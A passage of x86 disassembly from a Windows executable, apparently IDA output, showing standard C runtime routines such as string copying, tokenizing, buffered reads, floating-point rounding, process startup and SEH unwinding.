; ---------------------------------------------------------------------------
loc_4038CA: ; CODE XREF: sub_403850+5C�j
mov eax, [edx-4]
cmp al, bl
jz short loc_403907
test al, al
jz short loc_4038C4
cmp ah, bl
jz short loc_403900
test ah, ah
jz short loc_4038C4
shr eax, 10h
cmp al, bl
jz short loc_4038F9
test al, al
jz short loc_4038C4
cmp ah, bl
jz short loc_4038F2
test ah, ah
jz short loc_4038C4
jmp short loc_403888
; ---------------------------------------------------------------------------
loc_4038F2: ; CODE XREF: sub_403850+9A�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4038F9: ; CODE XREF: sub_403850+92�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_403900: ; CODE XREF: sub_403850+87�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_403907: ; CODE XREF: sub_403850+7F�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_403850 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403910 proc near ; CODE XREF: sub_417676+104�p
; sub_41783D+D9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_4039AF
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_40393C
shr ecx, 2
jnz loc_4039BF
jmp short loc_403963
; ---------------------------------------------------------------------------
loc_40393C: ; CODE XREF: sub_403910+1F�j
; sub_403910+45�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
sub ecx, 1
jz short loc_403976
test al, al
jz short loc_40397E
test esi, 3
jnz short loc_40393C
mov ebx, ecx
shr ecx, 2
jnz short loc_4039BF
loc_40395E: ; CODE XREF: sub_403910+AD�j
and ebx, 3
jz short loc_403976
loc_403963: ; CODE XREF: sub_403910+2A�j
; sub_403910+64�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
test al, al
jz short loc_4039A8
sub ebx, 1
jnz short loc_403963
loc_403976: ; CODE XREF: sub_403910+39�j
; sub_403910+51�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_40397E: ; CODE XREF: sub_403910+3D�j
test edi, 3
jz short loc_40399C
loc_403986: ; CODE XREF: sub_403910+8A�j
mov [edi], al
add edi, 1
sub ecx, 1
jz loc_403A2C
test edi, 3
jnz short loc_403986
loc_40399C: ; CODE XREF: sub_403910+74�j
mov ebx, ecx
shr ecx, 2
jnz short loc_403A17
loc_4039A3: ; CODE XREF: sub_403910+9B�j
; sub_403910+116�j
mov [edi], al
add edi, 1
loc_4039A8: ; CODE XREF: sub_403910+5F�j
sub ebx, 1
jnz short loc_4039A3
pop ebx
pop esi
loc_4039AF: ; CODE XREF: sub_403910+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4039B5: ; CODE XREF: sub_403910+C7�j
; sub_403910+DF�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_40395E
loc_4039BF: ; CODE XREF: sub_403910+24�j
; sub_403910+4C�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_4039B5
test dl, dl
jz short loc_403A09
test dh, dh
jz short loc_4039FF
test edx, 0FF0000h
jz short loc_4039F5
test edx, 0FF000000h
jnz short loc_4039B5
mov [edi], edx
jmp short loc_403A0D
; ---------------------------------------------------------------------------
loc_4039F5: ; CODE XREF: sub_403910+D7�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_403A0D
; ---------------------------------------------------------------------------
loc_4039FF: ; CODE XREF: sub_403910+CF�j
and edx, 0FFh
mov [edi], edx
jmp short loc_403A0D
; ---------------------------------------------------------------------------
loc_403A09: ; CODE XREF: sub_403910+CB�j
xor edx, edx
mov [edi], edx
loc_403A0D: ; CODE XREF: sub_403910+E3�j
; sub_403910+ED�j ...
add edi, 4
xor eax, eax
sub ecx, 1
jz short loc_403A23
loc_403A17: ; CODE XREF: sub_403910+91�j
xor eax, eax
loc_403A19: ; CODE XREF: sub_403910+111�j
mov [edi], eax
add edi, 4
sub ecx, 1
jnz short loc_403A19
loc_403A23: ; CODE XREF: sub_403910+105�j
and ebx, 3
jnz loc_4039A3
loc_403A2C: ; CODE XREF: sub_403910+7E�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_403910 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A34 proc near ; CODE XREF: sub_417676+1D�p
; sub_417676+5A�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov [ebp+var_2C], eax
call sub_40539D
push 8
pop ecx
mov [ebp+var_28], eax
xor eax, eax
lea edi, [ebp+var_24]
push 7
rep stosd
pop edi
loc_403A65: ; CODE XREF: sub_403A34+4A�j
mov dl, [esi]
movzx ecx, dl
mov eax, ecx
and ecx, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+var_24]
or [eax], bl
inc esi
test dl, dl
jnz short loc_403A65
mov edx, [ebp+var_2C]
test edx, edx
jnz short loc_403A94
mov eax, [ebp+var_28]
mov edx, [eax+18h]
jmp short loc_403A94
; ---------------------------------------------------------------------------
loc_403A8F: ; CODE XREF: sub_403A34+77�j
test al, al
jz short loc_403AAD
inc edx
loc_403A94: ; CODE XREF: sub_403A34+51�j
; sub_403A34+59�j
mov al, [edx]
movzx esi, al
xor ebx, ebx
mov ecx, esi
and ecx, edi
inc ebx
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test bl, cl
jnz short loc_403A8F
loc_403AAD: ; CODE XREF: sub_403A34+5D�j
mov ebx, edx
jmp short loc_403AC9
; ---------------------------------------------------------------------------
loc_403AB1: ; CODE XREF: sub_403A34+98�j
movzx esi, byte ptr [edx]
xor eax, eax
mov ecx, esi
and ecx, edi
inc eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test al, cl
jnz short loc_403AD0
inc edx
loc_403AC9: ; CODE XREF: sub_403A34+7B�j
cmp byte ptr [edx], 0
jnz short loc_403AB1
jmp short loc_403AD4
; ---------------------------------------------------------------------------
loc_403AD0: ; CODE XREF: sub_403A34+92�j
mov byte ptr [edx], 0
inc edx
loc_403AD4: ; CODE XREF: sub_403A34+9A�j
mov eax, [ebp+var_28]
mov ecx, [ebp+var_4]
mov [eax+18h], edx
mov eax, ebx
sub eax, edx
neg eax
sbb eax, eax
pop edi
and eax, ebx
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_403A34 endp
; =============== S U B R O U T I N E =======================================
sub_403AF3 proc near ; CODE XREF: sub_41B3D0+70�p
; sub_41B3D0+160�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_403B1A
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_403B1A: ; CODE XREF: sub_403AF3+9�j
mov eax, [eax+0Ch]
and eax, 10h
pop esi
retn
sub_403AF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B22 proc near ; CODE XREF: sub_403CB8+A1�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
test edi, edi
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
jz loc_403C72
cmp [ebp+arg_C], 0
jz loc_403C72
imul edi, [ebp+arg_C]
mov esi, [ebp+arg_10]
test word ptr [esi+0Ch], 10Ch
mov [ebp+var_10], edi
mov ebx, edi
jz short loc_403B68
mov eax, [esi+18h]
mov [ebp+var_C], eax
jmp short loc_403B6F
; ---------------------------------------------------------------------------
loc_403B68: ; CODE XREF: sub_403B22+3C�j
mov [ebp+var_C], 1000h
loc_403B6F: ; CODE XREF: sub_403B22+44�j
test edi, edi
jz loc_403C3E
loc_403B77: ; CODE XREF: sub_403B22+116�j
test word ptr [esi+0Ch], 10Ch
jz short loc_403BC0
mov eax, [esi+4]
test eax, eax
jz short loc_403BC0
jl loc_403CA3
cmp ebx, eax
mov edi, ebx
jb short loc_403B94
mov edi, eax
loc_403B94: ; CODE XREF: sub_403B22+6E�j
cmp edi, [ebp+var_4]
ja loc_403C43
push edi
push dword ptr [esi]
push [ebp+var_4]
push [ebp+var_8]
call sub_402F72
sub [esi+4], edi
add [esi], edi
add [ebp+var_8], edi
sub ebx, edi
add esp, 10h
sub [ebp+var_4], edi
mov edi, [ebp+var_10]
jmp short loc_403C36
; ---------------------------------------------------------------------------
loc_403BC0: ; CODE XREF: sub_403B22+5B�j
; sub_403B22+62�j
cmp ebx, [ebp+var_C]
jb short loc_403C0E
cmp [ebp+var_C], 0
mov eax, ebx
jz short loc_403BD6
xor edx, edx
div [ebp+var_C]
mov eax, ebx
sub eax, edx
loc_403BD6: ; CODE XREF: sub_403B22+A9�j
cmp eax, [ebp+var_4]
ja loc_403C79
push eax
push [ebp+var_8]
push esi
call sub_408A20
pop ecx
push eax
call sub_40A34F
add esp, 0Ch
test eax, eax
jz loc_403CB2
cmp eax, 0FFFFFFFFh
jz loc_403CA3
add [ebp+var_8], eax
sub ebx, eax
sub [ebp+var_4], eax
jmp short loc_403C36
; ---------------------------------------------------------------------------
loc_403C0E: ; CODE XREF: sub_403B22+A1�j
push esi
call sub_409C8D
cmp eax, 0FFFFFFFFh
pop ecx
jz loc_403CA7
cmp [ebp+var_4], 0
jz short loc_403C79
mov ecx, [ebp+var_8]
inc [ebp+var_8]
mov [ecx], al
mov eax, [esi+18h]
dec ebx
dec [ebp+var_4]
mov [ebp+var_C], eax
loc_403C36: ; CODE XREF: sub_403B22+9C�j
; sub_403B22+EA�j
test ebx, ebx
jnz loc_403B77
loc_403C3E: ; CODE XREF: sub_403B22+4F�j
mov eax, [ebp+arg_C]
jmp short loc_403C74
; ---------------------------------------------------------------------------
loc_403C43: ; CODE XREF: sub_403B22+75�j
xor esi, esi
cmp [ebp+arg_4], 0FFFFFFFFh
jz short loc_403C5A
push [ebp+arg_4]
push esi
push [ebp+arg_0]
call sub_407B70
add esp, 0Ch
loc_403C5A: ; CODE XREF: sub_403B22+127�j
call sub_4057D3
push esi
push esi
push esi
push esi
mov dword ptr [eax], 22h
push esi
loc_403C6A: ; CODE XREF: sub_403B22+17F�j
call sub_402F39
add esp, 14h
loc_403C72: ; CODE XREF: sub_403B22+1A�j
; sub_403B22+24�j
xor eax, eax
loc_403C74: ; CODE XREF: sub_403B22+11F�j
; sub_403B22+18E�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_403C79: ; CODE XREF: sub_403B22+B7�j
; sub_403B22+100�j
cmp [ebp+arg_4], 0FFFFFFFFh
jz short loc_403C8F
push [ebp+arg_4]
push 0
push [ebp+arg_0]
call sub_407B70
add esp, 0Ch
loc_403C8F: ; CODE XREF: sub_403B22+15B�j
call sub_4057D3
mov dword ptr [eax], 22h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
jmp short loc_403C6A
; ---------------------------------------------------------------------------
loc_403CA3: ; CODE XREF: sub_403B22+64�j
; sub_403B22+DC�j
or dword ptr [esi+0Ch], 20h
loc_403CA7: ; CODE XREF: sub_403B22+F6�j
; sub_403B22+194�j
mov eax, edi
sub eax, ebx
xor edx, edx
div [ebp+arg_8]
jmp short loc_403C74
; ---------------------------------------------------------------------------
loc_403CB2: ; CODE XREF: sub_403B22+D3�j
or dword ptr [esi+0Ch], 10h
jmp short loc_403CA7
sub_403B22 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403CB8 proc near ; CODE XREF: sub_403D7F+12�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push 0Ch
push offset dword_4213E8
call __SEH_prolog4
xor esi, esi
mov [ebp+var_1C], esi
mov ebx, [ebp+arg_8]
cmp ebx, esi
jz short loc_403CFB
mov edi, [ebp+arg_C]
cmp edi, esi
jz short loc_403CFB
xor eax, eax
cmp [ebp+arg_0], esi
setnz al
cmp eax, esi
jnz short loc_403D03
loc_403CE3: ; CODE XREF: sub_403CB8+7A�j
; sub_403CB8+88�j
call sub_4057D3
mov dword ptr [eax], 16h
push esi
push esi
push esi
push esi
push esi
call sub_402F39
add esp, 14h
loc_403CFB: ; CODE XREF: sub_403CB8+16�j
; sub_403CB8+1D�j
xor eax, eax
loc_403CFD: ; CODE XREF: sub_403CB8+BB�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_403D03: ; CODE XREF: sub_403CB8+29�j
cmp [ebp+arg_10], esi
jz short loc_403D13
or eax, 0FFFFFFFFh
xor edx, edx
div ebx
cmp edi, eax
jbe short loc_403D42
loc_403D13: ; CODE XREF: sub_403CB8+4E�j
cmp [ebp+arg_4], 0FFFFFFFFh
jz short loc_403D28
push [ebp+arg_4]
push esi
push [ebp+arg_0]
call sub_407B70
add esp, 0Ch
loc_403D28: ; CODE XREF: sub_403CB8+5F�j
xor eax, eax
cmp [ebp+arg_10], esi
setnz al
cmp eax, esi
jz short loc_403CE3
or eax, 0FFFFFFFFh
xor edx, edx
div ebx
cmp eax, edi
sbb eax, eax
inc eax
jz short loc_403CE3
loc_403D42: ; CODE XREF: sub_403CB8+59�j
push [ebp+arg_10]
call sub_40815B
pop ecx
mov [ebp+ms_exc.disabled], esi
push [ebp+arg_10]
push edi
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_403B22
add esp, 14h
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403D75
mov eax, [ebp+var_1C]
jmp short loc_403CFD
sub_403CB8 endp
; =============== S U B R O U T I N E =======================================
sub_403D75 proc near ; CODE XREF: sub_403CB8+B3�p
; DATA XREF: .rdata:00421400�o
push dword ptr [ebp+18h]
call sub_4081AD
pop ecx
retn
sub_403D75 endp
; =============== S U B R O U T I N E =======================================
sub_403D7F proc near ; CODE XREF: sub_41B3D0+D6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
push [esp+4+arg_8]
push [esp+8+arg_4]
push 0FFFFFFFFh
push [esp+10h+arg_0]
call sub_403CB8
add esp, 14h
retn
sub_403D7F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403DA0 proc near ; CODE XREF: sub_41A9DE+59E�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = qword ptr 4
cmp dword_433C78, 0
jz sub_40A6EF
sub esp, 8
stmxcsr [esp+8+var_4]
mov eax, [esp+8+var_4]
and eax, 1F80h
cmp eax, 1F80h
jnz short loc_403DD4
fnstcw word ptr [esp+8+var_8]
mov ax, word ptr [esp+8+var_8]
and ax, 7Fh
cmp ax, 7Fh
loc_403DD4: ; CODE XREF: sub_403DA0+23�j
lea esp, [esp+8]
jnz sub_40A6EF
jmp short $+2
movq xmm0, [esp+arg_0]
movapd xmm2, oword ptr ds:oword_41D3A0
movapd xmm1, xmm0
movapd xmm7, xmm0
psrlq xmm0, 34h
movd eax, xmm0
andpd xmm0, oword ptr ds:oword_41D3C0
psubd xmm2, xmm0
psrlq xmm1, xmm2
test eax, 800h
jz short loc_403E62
cmp eax, 0BFFh
jl short loc_403E9A
psllq xmm1, xmm2
cmp eax, 0C32h
jg short loc_403E33
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_403E33: ; CODE XREF: sub_403DA0+86�j
; sub_403DA0+E1�j
ucomisd xmm7, xmm7
jnp short loc_403E5D
mov edx, 3ECh
sub esp, 10h
mov [esp+10h+var_4], edx
mov edx, esp
add edx, 14h
mov [esp+10h+var_8], edx
mov [esp+10h+var_C], edx
mov [esp+10h+var_10], edx
call sub_40A42B
add esp, 10h
loc_403E5D: ; CODE XREF: sub_403DA0+97�j
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_403E62: ; CODE XREF: sub_403DA0+74�j
movq xmm0, [esp+arg_0]
psllq xmm1, xmm2
movapd xmm3, xmm0
cmppd xmm0, xmm1, 6
cmp eax, 3FFh
jl short loc_403EA1
cmp eax, 432h
jg short loc_403E33
andpd xmm0, oword ptr ds:oword_41D390
addsd xmm1, xmm0
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_403E9A: ; CODE XREF: sub_403DA0+7B�j
fld ds:dbl_41D3D0
retn
; ---------------------------------------------------------------------------
loc_403EA1: ; CODE XREF: sub_403DA0+DA�j
cmppd xmm3, oword ptr ds:oword_41D3B0, 6
andpd xmm3, oword ptr ds:oword_41D390
movq [esp+arg_0], xmm3
fld [esp+arg_0]
retn
sub_403DA0 endp
; =============== S U B R O U T I N E =======================================
sub_403EBD proc near ; CODE XREF: sub_403ECE�j
; sub_4102B0+35�p
arg_0 = dword ptr 4
push 0Ah
push 0
push [esp+8+arg_0]
call sub_40A9EB
add esp, 0Ch
retn
sub_403EBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403ECE proc near ; CODE XREF: sub_401F1C+11C�p
; sub_401F1C+128�p ...
jmp sub_403EBD
sub_403ECE endp
; =============== S U B R O U T I N E =======================================
sub_403ED3 proc near ; CODE XREF: .text:00403F78�p
; .text:00404015�p ...
arg_0 = dword ptr 4
cmp dword_425A9C, 1
jnz short loc_403EE1
call sub_409C54
loc_403EE1: ; CODE XREF: sub_403ED3+7�j
push [esp+arg_0]
call sub_409AB4
push 0FFh
call sub_4078A7
pop ecx
pop ecx
retn
sub_403ED3 endp
; =============== S U B R O U T I N E =======================================
sub_403EF7 proc near ; CODE XREF: .text:00403FFD�p
cmp word ptr ds:400000h, 5A4Dh
jnz short loc_403F35
mov eax, ds:40003Ch
cmp dword ptr [eax+400000h], 4550h
jnz short loc_403F35
cmp word ptr [eax+400018h], 10Bh
jnz short loc_403F35
cmp dword ptr [eax+400074h], 0Eh
jbe short loc_403F35
xor ecx, ecx
cmp [eax+4000E8h], ecx
setnz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
loc_403F35: ; CODE XREF: sub_403EF7+9�j
; sub_403EF7+1A�j ...
xor eax, eax
retn
sub_403EF7 endp
; ---------------------------------------------------------------------------
loc_403F38: ; CODE XREF: .text:0040411D�j
push 60h
push offset dword_421408
call __SEH_prolog4
and dword ptr [ebp-4], 0
lea eax, [ebp-70h]
push eax
call ds:dword_41D1A8 ; GetStartupInfoA
mov dword ptr [ebp-4], 0FFFFFFFEh
mov edi, 94h
push edi
push 0
mov ebx, ds:dword_41D100
call ebx ; GetProcessHeap
push eax
call ds:dword_41D114 ; RtlAllocateHeap
mov esi, eax
test esi, esi
jnz short loc_403F83
push 12h
call sub_403ED3
pop ecx
jmp loc_40410D
; ---------------------------------------------------------------------------
loc_403F83: ; CODE XREF: .text:00403F74�j
mov [esi], edi
push esi
call ds:dword_41D068 ; GetVersionExA
push esi
push 0
test eax, eax
jnz short loc_403FA1
call ebx ; GetProcessHeap
push eax
call ds:dword_41D10C ; RtlFreeHeap
jmp loc_40410D
; ---------------------------------------------------------------------------
loc_403FA1: ; CODE XREF: .text:00403F91�j
mov eax, [esi+10h]
mov [ebp-20h], eax
mov eax, [esi+4]
mov [ebp-24h], eax
mov eax, [esi+8]
mov [ebp-28h], eax
mov edi, [esi+0Ch]
and edi, 7FFFh
call ebx ; GetProcessHeap
push eax
call ds:dword_41D10C ; RtlFreeHeap
mov esi, [ebp-20h]
cmp esi, 2
jz short loc_403FD3
or edi, 8000h
loc_403FD3: ; CODE XREF: .text:00403FCB�j
mov ecx, [ebp-24h]
mov eax, ecx
shl eax, 8
mov edx, [ebp-28h]
add eax, edx
mov dword_425F78, esi
mov dword_425F80, eax
mov dword_425F84, ecx
mov dword_425F88, edx
mov dword_425F7C, edi
call sub_403EF7
mov [ebp-20h], eax
xor ebx, ebx
inc ebx
push ebx
call sub_405A83
pop ecx
test eax, eax
jnz short loc_40401B
push 1Ch
call sub_403ED3
pop ecx
loc_40401B: ; CODE XREF: .text:00404011�j
call sub_4054D6
test eax, eax
jnz short loc_40402C
push 10h
call sub_403ED3
pop ecx
loc_40402C: ; CODE XREF: .text:00404022�j
call sub_40B042
mov [ebp-4], ebx
call sub_4087E0
test eax, eax
jge short loc_404045
push 1Bh
call sub_40785D
pop ecx
loc_404045: ; CODE XREF: .text:0040403B�j
call ds:dword_41D1A4 ; GetCommandLineA
mov dword_434DF8, eax
call sub_40AF0D
mov dword_425A94, eax
call sub_40AE54
test eax, eax
jge short loc_40406B
push 8
call sub_40785D
pop ecx
loc_40406B: ; CODE XREF: .text:00404061�j
call sub_40ABE1
test eax, eax
jge short loc_40407C
push 9
call sub_40785D
pop ecx
loc_40407C: ; CODE XREF: .text:00404072�j
push ebx
call sub_407979
pop ecx
test eax, eax
jz short loc_40408E
push eax
call sub_40785D
pop ecx
loc_40408E: ; CODE XREF: .text:00404085�j
call sub_40AB84
test [ebp-44h], bl
jz short loc_40409E
movzx ecx, word ptr [ebp-40h]
jmp short loc_4040A1
; ---------------------------------------------------------------------------
loc_40409E: ; CODE XREF: .text:00404096�j
push 0Ah
pop ecx
loc_4040A1: ; CODE XREF: .text:0040409C�j
push ecx
push eax
push 0
push 400000h
call loc_41BBE3
mov [ebp-1Ch], eax
cmp dword ptr [ebp-20h], 0
jnz short loc_4040BE
push eax
call sub_407AD9
loc_4040BE: ; CODE XREF: .text:004040B6�j
call sub_407AFB
jmp short loc_4040F3
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-2Ch], ecx
push eax
push ecx
call sub_40AA15
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov eax, [ebp-2Ch]
mov [ebp-1Ch], eax
cmp dword ptr [ebp-20h], 0
jnz short loc_4040EE
push eax
call sub_407AEA
loc_4040EE: ; CODE XREF: .text:004040E6�j
call sub_407B0A
loc_4040F3: ; CODE XREF: .text:004040C3�j
mov dword ptr [ebp-4], 0FFFFFFFEh
mov eax, [ebp-1Ch]
jmp short loc_404112
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFEh
loc_40410D: ; CODE XREF: .text:00403F7E�j
; .text:00403F9C�j
mov eax, 0FFh
loc_404112: ; CODE XREF: .text:004040FD�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
call sub_40B08A
jmp loc_403F38
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404130 proc near ; CODE XREF: sub_402C0C+16�p
; sub_402C72+21�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_404160
loc_40413C: ; CODE XREF: sub_404130+1B�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_404193
test ecx, 3
jnz short loc_40413C
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_404160: ; CODE XREF: sub_404130+A�j
; sub_404130+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_404160
mov eax, [ecx-4]
test al, al
jz short loc_4041B1
test ah, ah
jz short loc_4041A7
test eax, 0FF0000h
jz short loc_40419D
test eax, 0FF000000h
jz short loc_404193
jmp short loc_404160
; ---------------------------------------------------------------------------
loc_404193: ; CODE XREF: sub_404130+13�j
; sub_404130+5F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40419D: ; CODE XREF: sub_404130+58�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_4041A7: ; CODE XREF: sub_404130+51�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_4041B1: ; CODE XREF: sub_404130+4D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_404130 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041BB proc near ; CODE XREF: sub_40121E+58�p
; sub_40150F+F�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_41D3D8
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
test eax, eax
pop edi
mov [ebp+var_4], eax
pop esi
jz short loc_4041EE
test byte ptr [eax], 8
jz short loc_4041EE
mov [ebp+var_C], 1994000h
loc_4041EE: ; CODE XREF: sub_4041BB+25�j
; sub_4041BB+2A�j
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call ds:dword_41D1AC ; RaiseException
leave
retn 8
sub_4041BB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404205 proc near ; CODE XREF: sub_40B8A9+65�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov ebp, [ebp+var_4]
mov esp, [ebx-4]
jmp eax
sub_404205 endp
; ---------------------------------------------------------------------------
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_404235 proc near ; CODE XREF: sub_40B3C2+31�p
; sub_40B818+59�p ...
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_404235 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40423C proc near ; CODE XREF: sub_4043C9+69�p
; sub_40B8A9:loc_40B8D1�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, large fs:0
mov [ebp+var_4], esi
mov [ebp+var_8], offset loc_404265
push 0
push [ebp+arg_4]
push [ebp+var_8]
push [ebp+arg_0]
call sub_413976 ; RtlUnwind
loc_404265: ; DATA XREF: sub_40423C+12�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and eax, 0FFFFFFFDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edi, large fs:0
mov ebx, [ebp+var_4]
mov [ebx], edi
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_40423C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40428E proc near ; CODE XREF: .text:0041C1E9�j
; .text:0041C204�j ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
cld
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push [ebp+var_4]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BD75
add esp, 20h
mov [ebp+var_8], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_40428E endp
; ---------------------------------------------------------------------------
loc_4042C4: ; DATA XREF: sub_40456E+24�o
push esi
cld
mov esi, [esp+0Ch]
mov ecx, [esi+8]
xor ecx, esi
call sub_402710
push 0
push esi
push dword ptr [esi+14h]
push dword ptr [esi+0Ch]
push 0
push dword ptr [esp+24h]
push dword ptr [esi+10h]
push dword ptr [esp+24h]
call sub_40BD75
add esp, 20h
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4042F4 proc near ; CODE XREF: sub_4043C9+81�p
; sub_40B915+53�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
